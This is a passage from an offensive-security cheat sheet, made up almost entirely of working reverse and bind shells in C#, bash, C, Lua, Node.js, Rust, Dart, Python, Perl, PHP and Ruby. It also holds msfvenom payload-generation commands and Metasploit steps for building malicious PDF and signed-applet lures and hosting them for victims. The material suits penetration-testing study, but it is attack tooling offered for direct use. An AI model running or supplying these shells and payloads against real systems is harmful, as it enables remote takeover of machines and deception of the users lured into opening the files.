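                p.BeginOutputReadLine();
                p.BeginErrorReadLine();

                string line;
                // ReadLine() returns null once the listener closes the connection.
                while (!p.HasExited && (line = rdr.ReadLine()) != null)
                {
                    p.StandardInput.WriteLine(line);
                }
                try { p.StandardInput.Close(); } catch (Exception) { /* pipe may already be gone */ }
                if (!p.HasExited) p.Kill();
            }
        }

        // Forwards one line of shell stdout/stderr to the socket; write failures mean the socket is gone
        // and there is nothing useful to do from inside the callback.
        private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
        {
            if (String.IsNullOrEmpty(outLine.Data)) return;
            try
            {
                streamWriter.WriteLine(outLine.Data);
                streamWriter.Flush();
            }
            catch (Exception)
            {
            }
        }
    }
}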
using System;
using System.Diagnostics;

namespace BackConnect
{
    // Thin C# wrapper around the bash /dev/tcp reverse shell: spawns sh -c "..." with stdout redirected
    // and echoes whatever it prints. The connection itself is made by the shell, so this only works where
    // /bin/sh understands /dev/tcp (i.e. is bash); it is not a Windows payload.
    class ReverseBash
    {
        public static void Main(string[] args)
        {
            Process proc = new System.Diagnostics.Process();
            proc.StartInfo.FileName = "sh";
            proc.StartInfo.Arguments = "-c \"sh -i >& /dev/tcp/127.0.0.1/4444 0>&1\"";
            proc.StartInfo.UseShellExecute = false;
            proc.StartInfo.RedirectStandardOutput = true;
            proc.Start();
            // Block until the shell exits so the host process (and the connection) stays alive.
            while (!proc.StandardOutput.EndOfStream)
            {
                Console.WriteLine(proc.StandardOutput.ReadLine());
            }
        }
    }
}
# Telnet reverse shell: a FIFO carries sh's output into telnet's stdin while telnet's output feeds sh.
# mktemp -u only generates the name; mkfifo creates the pipe (it is not cleaned up afterwards).
TF=$(mktemp -u); mkfifo $TF && telnet 127.0.0.1 4444 0<$TF | /bin/sh 1>$TF
# curl reverse shell: two separate curl telnet:// connections -- the first reads commands, the second
# ships output back -- so the listener must accept two simultaneous connections (e.g. a socat fork listener).
C='curl -Ns telnet://127.0.0.1:4444'; $C </dev/null 2>&1 | sh 2>&1 | $C >/dev/null
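#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * Minimal C reverse shell: connect to host:port, point fd 0/1/2 at the socket and exec a shell.
 * Fixes vs. the original: execve() does not search PATH, so "sh" only worked if a file named sh sat in
 * the current directory -- the path must be absolute; socket()/connect() failures are now checked instead
 * of exec'ing a shell whose stdio is an unconnected descriptor.
 */
int main(void) {
    int port = 4444;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    if (sockt < 0) return 1;

    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("127.0.0.1");

    if (connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr)) < 0) return 1;

    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"sh", NULL};
    execve("/bin/sh", argv, NULL);
    return 0;  /* only reached if execve() fails */
}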
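# Compile Above Code
# Run the binary by explicit path: the original "csh" relied on "." being in PATH and collides with the
# C shell (/bin/csh) when that is installed.
gcc /tmp/shell.c -o /tmp/rsh && /tmp/rsh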
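# Lua reverse shells (both need the luasocket module on the target)
# fd-3 trick as with the php -r variants: the socket lands on fd 3 when lua starts with only 0/1/2 open
lua -e "require('socket');require('os');t=socket.tcp();t:connect('127.0.0.1','4444');os.execute('sh -i <&3 >&3 2>&3');"
# Line-at-a-time variant: each received line runs through io.popen and its output is sent back (no TTY).
# The original only checked the "closed" status AFTER calling io.popen(cmd), so a dropped connection
# passed nil to popen and raised an error; the check now happens first.
lua5.1 -e 'local host, port = "127.0.0.1", 4444
local socket = require("socket")
local tcp = socket.tcp()
local io = require("io")
tcp:connect(host, port)
while true do
  local cmd, status, partial = tcp:receive()
  if not cmd or status == "closed" then break end
  local f = io.popen(cmd, "r")
  local s = f:read("*a")
  f:close()
  tcp:send(s)
end
tcp:close()'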
// Node.js: shell out to netcat with -e (needs a netcat build on the target that supports -e)
require('child_process').exec('nc -e sh 127.0.0.1 4444')
// Pure Node.js reverse shell: pipes the socket into sh's stdin and sh's stdout/stderr back to the socket.
// Wrapped in an IIFE so it can be dropped into an eval/SSTI sink as a single expression.
(function(){
    var net = require("net"), cp = require("child_process"), sh = cp.spawn("sh", []);
    var client = new net.Socket();
    client.connect(4444, "127.0.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
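use std::net::TcpStream;
use std::os::unix::io::{FromRawFd, IntoRawFd};
use std::process::{Command, Stdio};

/// Rust reverse shell: connect, then run `/bin/sh -i` with stdin/stdout/stderr bound to the socket.
/// `Stdio::from_raw_fd` takes ownership of the descriptor it is given and closes it on drop. The original
/// passed the same raw fd three times while `s` still owned it too, so the descriptor was closed four
/// times (and could close an unrelated fd that reused the number). Each Stdio now gets its own dup via
/// `try_clone()` + `into_raw_fd()`, which hands ownership over cleanly.
fn main() {
    let s = TcpStream::connect("127.0.0.1:4444").unwrap();
    let stdio = |sock: &TcpStream| unsafe { Stdio::from_raw_fd(sock.try_clone().unwrap().into_raw_fd()) };
    Command::new("/bin/sh")
        .arg("-i")
        .stdin(stdio(&s))
        .stdout(stdio(&s))
        .stderr(stdio(&s))
        .spawn()
        .unwrap()
        .wait()
        .unwrap();
}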
import 'dart:io';
import 'dart:convert';

// Dart reverse shell for Windows: every chunk received on the socket starts a NEW powershell.exe, writes
// the chunk to its stdin and streams its stdout back. Because a fresh process is spawned per command,
// state such as the working directory does not persist between commands; stderr is never forwarded and
// stdin is never closed, so each spawned powershell lingers until the socket is torn down.
main() {
  Socket.connect("127.0.0.1", 4444).then((socket) {
    socket.listen((data) {
      Process.start('powershell.exe', []).then((Process process) {
        process.stdin.writeln(new String.fromCharCodes(data).trim());
        process.stdout
            .transform(utf8.decoder)
            .listen((output) { socket.write(output); });
      });
    }, onDone: () { socket.destroy(); });
  });
}
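# Python3 Bind
# Listens on all interfaces, no authentication: while it is up anyone who can reach the port gets the shell.
# Each received chunk is run through a shell and the output returned (no TTY, no persistent cwd).
# Fixes vs. the original: exit when the client disconnects (recv() returning b"" spun forever running empty
# commands), and merge stderr into stdout so a chatty stderr cannot deadlock the two sequential reads.
# The original's while-loop inside exec("""...""") needs a real newline, so this is given as a heredoc.
python3 - <<'EOF'
import socket as s, subprocess as sp
s1 = s.socket(s.AF_INET, s.SOCK_STREAM)
s1.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1)
s1.bind(("0.0.0.0", 4444))
s1.listen(1)
c, a = s1.accept()
while True:
    d = c.recv(1024).decode()
    if not d:
        break
    p = sp.Popen(d, shell=True, stdout=sp.PIPE, stderr=sp.STDOUT, stdin=sp.PIPE)
    c.sendall(p.stdout.read())
c.close()
s1.close()
EOF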
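# Bind shells: the TARGET listens and the attacker connects in. None of these authenticate the client,
# so anyone who can reach the port gets the shell while they are up -- use them only when egress is
# blocked and tear them down afterwards.
# Netcat Linux Bind
nc -nlvp 51337 -e /bin/bash
# Netcat OpenBSD Bind (no -e: a FIFO feeds nc's output back into bash)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f
# Perl Bind Shell: accepts a client and exec's an interactive /bin/sh on it (exec replaces the process,
# so it serves one connection)
perl -e 'use Socket;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/sh -i");};'
# PHP Bind Shell: single client, "$ " prompt, each line runs via popen and its output is streamed back
php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",4444);socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;$in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);socket_write($cl,$m,strlen($m));}}'
# Powercat Bind Shell
# The script must be dot-sourced (". .\powercat.ps1") so the powercat function is defined in the current
# session; running ".\powercat.ps1" as the original did defines it in a child scope that is discarded.
# Start Bind Listener
. .\powercat.ps1   # Imports tool
powercat -l -p 4444 -ep
# Connect to Bind
. .\powercat.ps1   # Imports tool
powercat -c 127.0.0.1 -p 4444
# Ruby Bind: first client gets an interactive /bin/sh; %d formats the socket's fd number into the redirections
ruby -rsocket -e 'f=TCPServer.new(4444);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)'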
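#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
//#include <sys/types.h>

#define SHELL "/bin/bash" // shell to spawn when connection is received

/*
 * Forking TCP bind shell: ./tcpbind <listen port>.
 * The parent exits immediately so the listener detaches; each accepted client gets its own forked SHELL
 * with stdio on the socket. Unauthenticated by design: anything that can reach the port gets a shell.
 * Fixes vs. the original: msg[512] was never initialised yet written to every client (leaking
 * uninitialised stack bytes -- undefined behaviour and a fingerprint); that write is removed.
 * execl() was called with a NULL argv[0], which some shells reject; argv[0] is now the shell path.
 */
int main(int argc, char *argv[]) {
    int srv_sockfd, new_sockfd;
    socklen_t new_addrlen;
    struct sockaddr_in srv_addr, new_addr;

    if(argc != 2) {
        printf("\nusage: ./tcpbind <listen port>\n");
        return -1;
    }

    if(fork() == 0) {
        if((srv_sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
            perror("[error] socket() failed!");
            return -1;
        }

        srv_addr.sin_family = PF_INET;
        srv_addr.sin_port = htons(atoi(argv[1]));
        srv_addr.sin_addr.s_addr = htonl(INADDR_ANY);

        if(bind(srv_sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)) < 0) {
            perror("[error] bind() failed!");
            return -1;
        }
        if(listen(srv_sockfd, 1) < 0) {
            perror("[error] listen() failed!");
            return -1;
        }

        for(;;) {
            new_addrlen = sizeof(new_addr);
            new_sockfd = accept(srv_sockfd, (struct sockaddr *)&new_addr, &new_addrlen);
            if(new_sockfd < 0) {
                perror("[error] accept() failed!");
                return -1;
            }
            if(fork() == 0) {
                /* child: drop the listening socket, bind stdio to the client, become the shell */
                close(srv_sockfd);
                dup2(new_sockfd, 2);
                dup2(new_sockfd, 1);
                dup2(new_sockfd, 0);
                execl(SHELL, SHELL, (char *)NULL);
                return 0;  /* only reached if execl() fails */
            }
            else close(new_sockfd);  /* parent keeps accepting */
        }
    }
    return 0;
}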
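# Compile Above Code
# The program requires the listen port as its only argument (it prints usage and exits otherwise), which
# the original invocation omitted. Run it by expl path rather than "csh", which relied on "." being in
# PATH and collides with /bin/csh.
gcc /tmp/bindshell.c -o /tmp/tcpbind && /tmp/tcpbind 4444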
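# Windows executables.
# Staged ("shell/..." / "meterpreter/..." with a slash): a small stager is sent first and pulls the full
# stage from the handler, so the listener must be a metasploit multi/handler set to the same payload.
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > rev.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -o meterpreter.exe
msfvenom -p windows/x64/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > rev.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -o meterpreter.exe
# Stageless ("shell_reverse_tcp" / "meterpreter_reverse_tcp" with an underscore): everything in one
# binary -- larger, but fewer round trips, and the shell_* variants work with a plain nc listener.
# The stageless meterpreter names are windows/meterpreter_reverse_tcp and windows/x64/meterpreter_reverse_tcp;
# the original's "windows/meterpreter/shell_reverse_tcp" is not a payload msfvenom knows.
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > rev.exe
msfvenom -p windows/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > meterpreter.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > rev.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe > meterpreter.exe
# Windows Bind Shell: the target listens; connect with multi/handler (set RHOST/LPORT). Bind payloads
# do not use LHOST, so it is dropped; the file is named bind.exe (the original called it reverse.exe).
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o bind.exe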
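# Linux ELF payloads.
# Staged ("shell/..." / "meterpreter/..." with a slash): small stager, the stage is pulled from a multi/handler.
msfvenom -p linux/x86/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf >rev.elf
msfvenom -p linux/x64/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf
# Stageless (underscore): everything in one binary. The stageless meterpreter payloads are
# linux/x86/meterpreter_reverse_tcp and linux/x64/meterpreter_reverse_tcp -- the original's
# "meterpreter/shell_reverse_tcp" does not exist in msfvenom.
msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf > rev.elf
# (every line writes rev.elf -- rename the outputs if you generate more than one)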
# Web payloads: drop the file where the server will execute it and start multi/handler with the same payload.
# ASP
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f asp > shell.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f asp > shell.asp
# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > shell.jsp
# WAR (deployable to Tomcat/JBoss-style managers; the JSP inside is reached under the WAR's context path)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f war > shell.war
# PHP
msfvenom -p php/reverse_php LHOST=127.0.0.1 LPORT=4444 -f raw > shell.php
msfvenom -p php/meterpreter/reverse_php LHOST=127.0.0.1 LPORT=4444 -f raw > shell.php
# HTTPS Shell: the stager talks TLS to the handler. The file is named 443.exe but lport is 4444 here --
# keep the name, the port and the handler's LPORT in sync.
msfvenom -p windows/meterpreter/reverse_https lhost=127.0.0.1 lport=4444 -f exe > ~/Documents/payloads/443.exe
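# Msfvenom example on how to exploit a PDF vulnerability in Adobe
# (metasploit-console workflow; adobe_utilprintf targets a 2008-era Adobe Reader bug, so expect it only on
# legacy targets -- the delivery and handler steps are the reusable part)
sudo msfdb init    # Initializes the Metasploit database if you have not run it before (the original "msfdbinit" is not a command)
sudo msfconsole    # Opens Metasploit
# Metasploit Commands
use exploit/windows/fileformat/adobe_utilprintf
show options
set FILENAME msf.pdf
set TARGET 0
# also set LHOST here if the default interface is not the one the target can reach -- it is baked into the PDF
exploit
# (this simply creates a malicious pdf file. hosting it for delivery and setting up a payload handler still needs to be done to use)
# Terminal Commands
cp /root/.msf4/local/msf.pdf /var/www   # copies the malicious pdf to the web server (/var/www/html on Debian-style Apache layouts)
systemctl start apache2 || systemctl start httpd   # starts the web server
# Metasploit Start Listening Handler
use multi/handler
set payload windows/meterpreter/reverse_tcp   # must match the payload the PDF was built with (check the exploit module's options)
set LHOST 10.10.15.25
show advanced
set ExitOnSession false   # allows multiple sessions to be caught
run -j                    # runs the handler as a background job so sessions keep being accepted
--------------------------------------
# Embed an Executable Inside Adobe PDF
# Metasploit Commands
use exploit/windows/fileformat/adobe_pdf_embedded_exe
show options
set EXENAME   # (prebuilt executables can be selected here)
set INFILENAME /usr/share/set/readme/User_Manual.pdf   # (selects the PDF to insert the executable into)
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.15.25
set LAUNCH_MESSAGE   # (sets the message the user will be shown to entice opening)
# SET UP A HANDLER FOR THE PAYLOAD (same multi/handler steps as above). The module prints the generated
# file's name when run -- it may not be msf.pdf; adjust the cp path accordingly.
cp /root/.msf4/local/msf.pdf /var/www
systemctl start apache2 || systemctl start httpd
use multi/handler
run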
# Script-language reverse shells (cmd/unix/* payloads emit the interpreter one-liner, -f raw = just the text)
# Python
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=4444 -f raw > shell.py
# Bash
msfvenom -p cmd/unix/reverse_bash LHOST=127.0.0.1 LPORT=4444 -f raw > shell.sh
# Perl
msfvenom -p cmd/unix/reverse_perl LHOST=127.0.0.1 LPORT=4444 -f raw > shell.pl
# PHP: the raw output does not start with an opening tag, so the pbcopy/pbpaste dance prepends "<?php ".
# pbcopy/pbpaste are macOS-only; on Linux use e.g.  sed -i '1s/^/<?php /' shell.php  instead.
msfvenom -p php/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
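# macOS (the original label said OpenBSD; osx/* payloads are Mach-O binaries for Apple platforms only)
msfvenom -p osx/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f macho > shell.macho
# 32-bit x86 Mach-O does not run on Catalina+ or Apple-silicon macOS; use osx/x64/shell_reverse_tcp there
msfvenom -p osx/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f macho > shell.macho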
# Android APK (no -f needed: the default output for android/* payloads is already an APK).
# NOTE(review): recent Android versions may refuse to install it until it is (re)signed -- verify on the target version.
msfvenom -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 > ~/Documents/payloads/file.apk
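# JAVA APPLET EXPLOIT
# Bypass the need for an unpatched Java vulnerability by asking the user to run a signed applet.
# Legacy technique: applet support was removed from Java 11 and from all current browsers, so this only
# works against very old client stacks.
sudo msfdb init    # Initializes the Metasploit database if you have not run it before (the original "msfdbinit" is not a command)
sudo msfconsole    # Opens Metasploit
# Metasploit Commands
use exploit/multi/browser/java_signed_applet
show options
set APPLETNAME javaapplet
set SRVHOST 127.0.0.1
set SRVPORT 80
# Java shows the signer as "unknown" unless a trusted code-signing certificate is supplied via "set SigningCert"
show targets
set target 0
set payload java/meterpreter/reverse_tcp
set LHOST 127.0.0.1
run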